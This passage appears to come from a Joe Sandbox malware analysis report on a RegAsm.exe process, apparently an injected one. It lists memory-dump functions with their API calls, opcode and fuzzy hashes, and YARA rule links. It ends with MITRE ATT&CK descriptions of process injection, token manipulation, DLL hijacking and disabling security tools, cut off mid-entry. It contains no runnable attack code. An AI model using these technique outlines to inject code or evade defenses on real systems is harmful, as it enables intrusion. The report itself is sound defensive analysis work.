Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 1951d96cb1224ce1242059d19e2097a6c86893d8276e7144d2292de61cecdab2
Instruction ID: c4ea9c61e1175d92f19a3f5a4bd945c59b3caca55d22cfde6fd5af61a1a2e664
Opcode Fuzzy Hash: 1951d96cb1224ce1242059d19e2097a6c86893d8276e7144d2292de61cecdab2
Instruction Fuzzy Hash: D301D671500308EFEB61CF16DC85B76FBA8EF44720F58849AEE459B246D2B4E504CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0CBE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF0D11

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: d11e9f033534d32ad1ee50e5af57f8ed6c878c6827d8b23eaac77424cb1a196f
Instruction ID: 374eee21cd3bd3779d98899b084e8dfa6e3967fe9d901816e0c377846b7a66bf
Opcode Fuzzy Hash: d11e9f033534d32ad1ee50e5af57f8ed6c878c6827d8b23eaac77424cb1a196f
Instruction Fuzzy Hash: 2901D671500308AFE761CF56DC85B66FB98DF44720F64845AEE059B286D274E904CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF34B2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF34F7

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 7a19cd5dd6ac4521fad11671ccf134e15da165e41a39e8049d3040b7510bba97
Instruction ID: 7b600b4f5d29eb6a750549cebf5950a1591ffdcc509dd4b6c845d8671fe3c34f
Opcode Fuzzy Hash: 7a19cd5dd6ac4521fad11671ccf134e15da165e41a39e8049d3040b7510bba97
Instruction Fuzzy Hash: E01182716002849FDB60CF1AD884766BBD8EF04320F08C4AADD49CB646E334D904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2EDE, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00CF2F2A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 50171710e57f6e8f4dcc19788180dce9f4590e1807dca5552cc4d5c4588c20f3
Instruction ID: 942e7d78cb3c72c0f92d58309758c90393aa8f6f258c3a151c1ad72136b732af
Opcode Fuzzy Hash: 50171710e57f6e8f4dcc19788180dce9f4590e1807dca5552cc4d5c4588c20f3
Instruction Fuzzy Hash: A7117C715007049FDB61CF96D884B62FBF4FF04320F0884AAEE498B662D375E818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA172, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(?,00000EB4,?,?), ref: 1D7DA1C2

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 8f64de95fbb58fb70965b710afabb1582c953eb23e36f4db3944f316162e6de4
Instruction ID: eb850e9db279bc333878a27f2285d7bdcb54b21227d86e37ec9935a28edec4ad
Opcode Fuzzy Hash: 8f64de95fbb58fb70965b710afabb1582c953eb23e36f4db3944f316162e6de4
Instruction Fuzzy Hash: E101B171500600ABD710DF1ADC81B26FBA8EB88A20F14816AED089B641D231B915CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1D7DB6FA

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: d67a9e70d0fa1ea2fdccd8876d51327bc77e3cae95bdc041b508dc253fb84b8c
Instruction ID: d8c7116934e0ef6fd01e37334b37c777292db0aa72e61ed81e8d90d081d76859
Opcode Fuzzy Hash: d67a9e70d0fa1ea2fdccd8876d51327bc77e3cae95bdc041b508dc253fb84b8c
Instruction Fuzzy Hash: E5017171500604ABD714DF1ADC85B26FBA8EB89B20F14856AED089B641D231B915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CF363A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF3674

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: DirectoryRemove
String ID:
API String ID: 597925465-0
Opcode ID: 2e93ebc38ab72146582bedce6aa80a1805d57f25509c41b188121c5c2dfaf44b
Instruction ID: e9b2983be25a83644fe1812cf7cdd70c29b16c122a1381c10a73b35fc655099c
Opcode Fuzzy Hash: 2e93ebc38ab72146582bedce6aa80a1805d57f25509c41b188121c5c2dfaf44b
Instruction Fuzzy Hash: 8B017571600344EFDB50CF2AD985766FBA4EF00320F18C4AAED49CF746D674D904CA62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7DA7F6

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6e8cc433ce9262dd8dc1356f68bf2670a6777235c8431e0562cb23186077b7c2
Instruction ID: 9b4f200c2d16f4a3e16e7abe82a1272140fa0893361628f473c51295716a63f6
Opcode Fuzzy Hash: 6e8cc433ce9262dd8dc1356f68bf2670a6777235c8431e0562cb23186077b7c2
Instruction Fuzzy Hash: C7016D32400740DFDB628F55D944B56FFE0FF08721F08C8AADD494A656D375E419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1D7DAB7E

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: f9c5785edf9313e964534de4793f20858b12181b591dea1a6bdf03619eea1f40
Instruction ID: 97d9b027d91e11fa2cecebc120c551f598f443bcf8ae7e887e0d85dd6d648df3
Opcode Fuzzy Hash: f9c5785edf9313e964534de4793f20858b12181b591dea1a6bdf03619eea1f40
Instruction Fuzzy Hash: 0501A271500604ABD324DF1ADC82B22FBA4FB89B20F14811AED085B741D231F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB30E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D7DB35E

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f1a249726c6dafc9bbcfc4a4cecc371de0154fb31e3568e5706b68f234017520
Instruction ID: a5c19b2ddf476c09846ad9d13482da237a7f9b40e15ebd8ec46c3c36f6167d39
Opcode Fuzzy Hash: f1a249726c6dafc9bbcfc4a4cecc371de0154fb31e3568e5706b68f234017520
Instruction Fuzzy Hash: 7A016271500605ABD324DF1ADC86B26FBA4FB89B20F14815AED085B741D371F916CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1BE2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 00CF1C20

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: d4960aa09087688f4ef7ae5afbe182e3983dad219402f1a85e2f1534cd4c1ccb
Instruction ID: 0dce848fb71ce08104324f32804d686f140539fd6c9559e2cc52346955ae9371
Opcode Fuzzy Hash: d4960aa09087688f4ef7ae5afbe182e3983dad219402f1a85e2f1534cd4c1ccb
Instruction Fuzzy Hash: 86018872400344DFDB608F56D884B66FFA0EF04320F0888AADE898B616D375A418DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF16BA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF16EC

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f7f9a09d803a4ec7bae958bd39e665259600ca8e7d30dd886fb9e284f84899e7
Instruction ID: de19544d4e1302356def82e795140f7424182f4cc36e65112ae7c24ae7bf8b5e
Opcode Fuzzy Hash: f7f9a09d803a4ec7bae958bd39e665259600ca8e7d30dd886fb9e284f84899e7
Instruction Fuzzy Hash: 22017C75A04344DFDB608F5AD8847A6FBA4EF00321F08C4ABDD498B646D678A808CE62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF141A, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 00CF146A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 76b4fa4bd3cff7be26cd5f23c456eb562a387ef7937409145582001c23d8439f
Instruction ID: bc54865dec0e23645b096b24127dea442395661c76aade9d491958470bb8246b
Opcode Fuzzy Hash: 76b4fa4bd3cff7be26cd5f23c456eb562a387ef7937409145582001c23d8439f
Instruction Fuzzy Hash: 7001A271500604ABD324DF1ADC82B22FBA4FB89B20F14811AED085B741D331F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA47A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1D7DA4AC

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3c0f31c60fc30a4d4174361c56726f94e6400616b2ce8c024030217f997a490c
Instruction ID: 39a8deac36b18850df8d6f8f519e1bcff44f83f7cc986a8f2f4ce040880983da
Opcode Fuzzy Hash: 3c0f31c60fc30a4d4174361c56726f94e6400616b2ce8c024030217f997a490c
Instruction Fuzzy Hash: 0101AD719007449FDBA1DF1AD988752FBA0FF10631F08C4AADD488F646D278A408CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA876, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 1D7DA8A8

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 297357a2de77d93f1b4b204288dda600fe071ebe38dfe85c1f6610f73ac1f86b
Instruction ID: 500e83dc5e3b3b86758939c88636f963912d39db23398c4d3a188e72b1696dcb
Opcode Fuzzy Hash: 297357a2de77d93f1b4b204288dda600fe071ebe38dfe85c1f6610f73ac1f86b
Instruction Fuzzy Hash: 5BF0FF30900B40CFE7618F06D884712FFA0FF10730F18C09ACD090B656E378A809CAA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D05548, Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00D05615

Memory Dump Source

Source File: 00000007.00000002.1031529971.0000000000D05000.00000040.00000001.sdmp, Offset: 00D05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d05000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7281f01823a10e44b58596e76a94e0624fc25bd17dab6b2910e0abfcd6183f63
Instruction ID: ac0e4a7b0fcc22d393ba7b157eac1865f567df4003c2842ebce4958666340732
Opcode Fuzzy Hash: 7281f01823a10e44b58596e76a94e0624fc25bd17dab6b2910e0abfcd6183f63
Instruction Fuzzy Hash: AFD02B2A24478516D7214A08BCA038627E27F86310F988146DD49470C4D26284418622

Uniqueness

Uniqueness Score: -1.00%

Function 1D950700, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9b49852683ce10e9524f2c9f68ca6e6d6f37e439f8b4ad04ba2dbf9324278b
Instruction ID: c910b97a0ca0ce76774354d7ce24802a952d5bf6e10a16be5472551d5aeb7920
Opcode Fuzzy Hash: 1a9b49852683ce10e9524f2c9f68ca6e6d6f37e439f8b4ad04ba2dbf9324278b
Instruction Fuzzy Hash: DF210C3510E7C59FC7078B2098A0755BFB1AF47204F2A85EFD4899B6A3C33A8846CB52

Uniqueness

Uniqueness Score: -1.00%

Function 201E2F8A, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b763fc57eeb624e7be983b9a283e320769ceb9f8a893d4e0a9ff54adf3ef0c
Instruction ID: e23a646f5467151b8b6c44a422ca015f17c18227cbec2ab4855179d63934fef7
Opcode Fuzzy Hash: d0b763fc57eeb624e7be983b9a283e320769ceb9f8a893d4e0a9ff54adf3ef0c
Instruction Fuzzy Hash: DB21C8B5508341AFD350CF19D840A5BFBE4FF89664F04896EF988D7311E275E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 201E39FC, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a0c8e5248c60bb670c656470c35122712419eb0e05a1465882000eaabdae16
Instruction ID: 4eec62cf539819f130575e1bd758edcec725260e2a34027468d0780b50ebacda
Opcode Fuzzy Hash: 69a0c8e5248c60bb670c656470c35122712419eb0e05a1465882000eaabdae16
Instruction Fuzzy Hash: 2F11BAB5508301AFD350CF19D880A5BFBE4FB88664F04896EF998D7311E231E9148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D95075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3453ed7e439da774b2e78b1f85e785489116e157b45616589f055d0079dc29
Instruction ID: f80dde89cf63a857c25392a0fb1489e7068737f8442e6457076bf7c71fa9b75d
Opcode Fuzzy Hash: aa3453ed7e439da774b2e78b1f85e785489116e157b45616589f055d0079dc29
Instruction Fuzzy Hash: BB11A235204685DFD306CB14C980B26BB95AB88B08F24C9AEE94D0B652C77BD803CE52

Uniqueness

Uniqueness Score: -1.00%

Function 1D95072C, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f256c4022fd657819050431faecdf33854045e6ed01c981cfb45f0c77e9595
Instruction ID: 27d752511174c58241a1580b6d9017d3ae66edf4e02209c054211a54b0d1308e
Opcode Fuzzy Hash: b6f256c4022fd657819050431faecdf33854045e6ed01c981cfb45f0c77e9595
Instruction Fuzzy Hash: C72159351097C59FC703CB20D990B55BFB1AB46204F2985EED8889B6A3C33A8846CB52

Uniqueness

Uniqueness Score: -1.00%

Function 201E38A0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb7bd54fd19cf21e3abc25cf548618216630396643ccb97a8149d87a8c31cd82
Instruction ID: 7b003f080d77a3a0e5ec0bf3acf47a389d8f9d705ca4841d2def808a426fe498
Opcode Fuzzy Hash: eb7bd54fd19cf21e3abc25cf548618216630396643ccb97a8149d87a8c31cd82
Instruction Fuzzy Hash: C411BEB5508305AFD350CF09DC81A57FBE8EB88660F14891EFD5997311D271E9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D9505CF, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041ff24a419b20915de5ead45602de7bbdf3bb58269a12652a74c18587287b48
Instruction ID: 137a7a4c5293ec0d8bc263dbc3c3abff8fc4ef92e1465a4a4777bf7b80560ddc
Opcode Fuzzy Hash: 041ff24a419b20915de5ead45602de7bbdf3bb58269a12652a74c18587287b48
Instruction Fuzzy Hash: B001F97250D7806FD7128F169C40863FFB8EF86630709C59FEC49CB612D229A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D950818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: 1d114fe18e4bede319b62b42d2825e3b9f2dcaef345dec119f0ee1fb7c610868
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: E1F0FB35104645DFC206CB40D940B15FBA6EB89718F24C6ADE9480B752C337D813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 1D9505F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035293344.000000001D950000.00000040.00000040.sdmp, Offset: 1D950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d950000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048c3a46c96b7a7968f3841f5a86971084cd38ee9cadc429c726bb257271fbd0
Instruction ID: ffbfe4d1edcd09344f1305410a7ecaa9f6c069f6829201db024b8b538dcf7df8
Opcode Fuzzy Hash: 048c3a46c96b7a7968f3841f5a86971084cd38ee9cadc429c726bb257271fbd0
Instruction Fuzzy Hash: CEE06DB66006049BD650CF0AEC41552FBD4EB84631718C06FDC0D8B701E635B508CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 201E3313, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606387307ddf92858d7dd173456e1e93374a38e58924e8c4ab563799fa464e22
Instruction ID: 0df93cb6733b07467b3b064be0f19cc7fdd685e1cc72267a957d7ae781d85f72
Opcode Fuzzy Hash: 606387307ddf92858d7dd173456e1e93374a38e58924e8c4ab563799fa464e22
Instruction Fuzzy Hash: A7E0D8B260130467D2208F069C41B13FB98EB40A30F04C45BED095B702E172B514C9E2

Uniqueness

Uniqueness Score: -1.00%

Function 201E3A67, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93da2132f032252bad7bb78bb7ed9737508ce34c4a87153cd15df6a1da179e5
Instruction ID: 10c0484987f6af56aa2dae9bc645ce26197d09f5c869955adbdcf348cfcb391c
Opcode Fuzzy Hash: d93da2132f032252bad7bb78bb7ed9737508ce34c4a87153cd15df6a1da179e5
Instruction Fuzzy Hash: B3E0D8B254030467D3208F069C41B13FB98EB54A31F04C46BED085B742E171B5148AE2

Uniqueness

Uniqueness Score: -1.00%

Function 201E2FFF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9f366080090aa136e97cf5540959d9ae7773ec0944e7b8b580dc866c290831
Instruction ID: be3fb3d2f693288065cd8158a37792d4495c0c5032a63f8b8b7ac72338e69fba
Opcode Fuzzy Hash: de9f366080090aa136e97cf5540959d9ae7773ec0944e7b8b580dc866c290831
Instruction Fuzzy Hash: 49E0D8B250030467D3208F069C41B13FB98EB40A30F04C45BED085B742E171B51489E2

Uniqueness

Uniqueness Score: -1.00%

Function 201E38EF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1037202478.00000000201E0000.00000040.00000001.sdmp, Offset: 201E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_201e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1be066e56366676c931dbde073e602fa0b64ec4e585e9451d1218d81353854
Instruction ID: df13b6d8a7fa5ced5da247e8a64eedda4f6277de406c3810c2375a414aa8359c
Opcode Fuzzy Hash: aa1be066e56366676c931dbde073e602fa0b64ec4e585e9451d1218d81353854
Instruction Fuzzy Hash: 56E0D8B250030467D2608F069C81B13FB98EB40A30F04C45BED0D5B702E172B5148AF2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035165532.000000001D7D2000.00000040.00000001.sdmp, Offset: 1D7D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7d2000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76558831b45cd72f24bedc42f2a28ffe7b1ceee7a223c8fc45010c0b8242ede
Instruction ID: 7cb2aeead3f64b435384e21f16a230ed3e71050746d9b7f7c9c8df4cb6befd93
Opcode Fuzzy Hash: e76558831b45cd72f24bedc42f2a28ffe7b1ceee7a223c8fc45010c0b8242ede
Instruction Fuzzy Hash: 39D05E79705B914FD3538A1CC1A0BA53BD4AB52B24F5644FAAC008B767C768DA82D211

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1035165532.000000001D7D2000.00000040.00000001.sdmp, Offset: 1D7D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7d2000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f1df17c1c501b1ca29d092061307fd4d391b3f5e1e10074f0bd71dade907c0
Instruction ID: be23ac1963dca9542f44c814c61300866319c1b0f6cd51bb2b73cfa757087a7b
Opcode Fuzzy Hash: 57f1df17c1c501b1ca29d092061307fd4d391b3f5e1e10074f0bd71dade907c0
Instruction Fuzzy Hash: AED05E346007814BC741DB0CC2D0F6937D4AB80B20F0644E9AC018F366C7B4D8C2C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
